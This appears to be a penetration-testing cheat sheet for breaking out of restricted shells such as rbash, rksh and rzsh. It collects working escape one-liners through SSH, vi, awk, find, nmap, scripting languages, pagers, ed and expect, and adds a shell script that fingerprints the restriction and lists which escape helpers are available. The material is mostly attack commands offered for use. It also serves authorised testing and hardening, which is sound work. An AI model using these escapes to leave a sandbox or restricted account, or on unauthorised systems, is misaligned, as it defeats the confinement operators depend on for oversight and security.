Restricted Shell Escapes
Breaking out of rbash, rksh, rzsh, and limited shells.
Identify restricted shell
Check what you're working with before trying escapes
echo $SHELL   # login shell from /etc/passwd
echo $0       # name of the shell actually running (rbash, rksh, rzsh; login shells show a leading -)
echo $PATH    # restricted shells usually get one locked-down bin directory and refuse to change PATH
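Added example, not from this page: a small POSIX-sh fingerprint you can paste line by line into the restricted prompt (it uses no slashes in command names and no redirections, so rbash and rksh accept it). It checks the shell name, the r flag bash carries in $- while restricted, and which of the escape helpers listed on this page are executable on a given PATH string. The function names and the report layout are mine; the helper list is the page's own.

```sh
#!/bin/sh
# Added example, not part of the original cheat sheet: fingerprint the shell
# you landed in and list which of the escape helpers on this page are reachable.

# Does a shell name (argv[0], $SHELL or $0) look like a restricted shell?
# Handles full paths and the leading "-" that login shells carry in $0.
is_restricted_shell_name() {
    name="${1##*/}"      # strip directory part
    name="${name#-}"     # strip login-shell dash
    case "$name" in
        rbash|rksh|rzsh) return 0 ;;
        *)               return 1 ;;
    esac
}

# bash sets the letter r in $- while it runs restricted (rbash or bash -r).
# Pass "$-" in; prints "restricted" or "unrestricted".
bash_flags_restricted() {
    case "$1" in
        *r*) echo restricted ;;
        *)   echo unrestricted ;;
    esac
}

# Which escape helpers from this page are executable somewhere on a given
# PATH string? Prints the names found, space separated, in page order.
find_escape_bins() {
    found=""
    for bin in vi vim awk find nmap python3 perl ruby less more man ed expect; do
        for dir in $(printf '%s\n' "$1" | tr ':' '\n'); do
            if [ -x "$dir/$bin" ]; then
                found="$found $bin"
                break
            fi
        done
    done
    printf '%s\n' "${found# }"
}

# One-shot report for the current session.
restricted_shell_report() {
    printf 'SHELL=%s  $0=%s\n' "$SHELL" "$0"
    if is_restricted_shell_name "$0" || is_restricted_shell_name "$SHELL"; then
        echo "shell name indicates a restricted shell"
    fi
    echo "bash flags: $(bash_flags_restricted "$-")"
    echo "PATH=$PATH"
    echo "escape helpers on the current PATH: $(find_escape_bins "$PATH")"
    # The restricted PATH hides most helpers; the system directories usually
    # still hold them, and awk/find/python can exec /bin/bash by absolute path
    # because the slash check is enforced by rbash, not by the kernel.
    echo "escape helpers on a normal PATH: $(find_escape_bins /usr/local/bin:/usr/bin:/bin)"
}

restricted_shell_report
```

Run the report first, then pick the escape whose helper shows up in the second list; the first list is only what the restricted shell lets you call by bare name.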
SSH escape
Bypass restricted shell at login: sshd hands the command to the login shell with -c, so a restriction applied from a profile or rc file is skipped, while one built into the login shell itself (rbash as the /etc/passwd shell) is not. Fails when sshd enforces a ForceCommand.
ssh user@$IP -t bash
ssh user@$IP -t /bin/sh                    # rbash as login shell refuses command names containing a slash; use the bare name instead
ssh user@$IP -t "bash --noprofile --norc"  # skip the profile and rc files that would re-apply the restriction
vi / vim escape
Open vi then spawn shell (not with rvim or vim -Z, which disable :! and :shell)
vi
:set shell=/bin/bash
:shell
# Or: :!/bin/bash
awk / find / nmap escape
Common binary escapes. The child /bin/bash inherits the restricted PATH, so fix PATH once you are in it.
awk 'BEGIN {system("/bin/bash")}'
find . -exec /bin/bash \; -quit   # -quit (GNU find) stops after the first shell exits instead of spawning one per file
nmap --interactive                # nmap < 5.35 only
!sh                               # typed at the nmap> prompt
Python/Perl/Ruby escape
Scripting language shells
python3 -c 'import os; os.system("/bin/bash")'
perl -e 'exec "/bin/bash";'
ruby -e 'exec "/bin/bash"'
less/more/man escape
Pager commands: drop to a shell from the pager prompt. Needs a pager that allows !, so less refuses when LESSSECURE=1 is set, and man only helps if its pager is less or more.
less /etc/passwd
!/bin/bash
man man
!/bin/bash   # typed at the prompt of the pager man opened
PATH manipulation
If PATH is restricted, set it manually. rbash and rksh refuse to change PATH, so run this from the unrestricted shell you escaped into, not from the restricted one.
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
ed / expect escape
Less common escapes
ed
!'/bin/bash'   # ed's ! hands its argument to /bin/sh, which strips the quotes and runs /bin/bash
expect -c 'spawn /bin/bash; interact'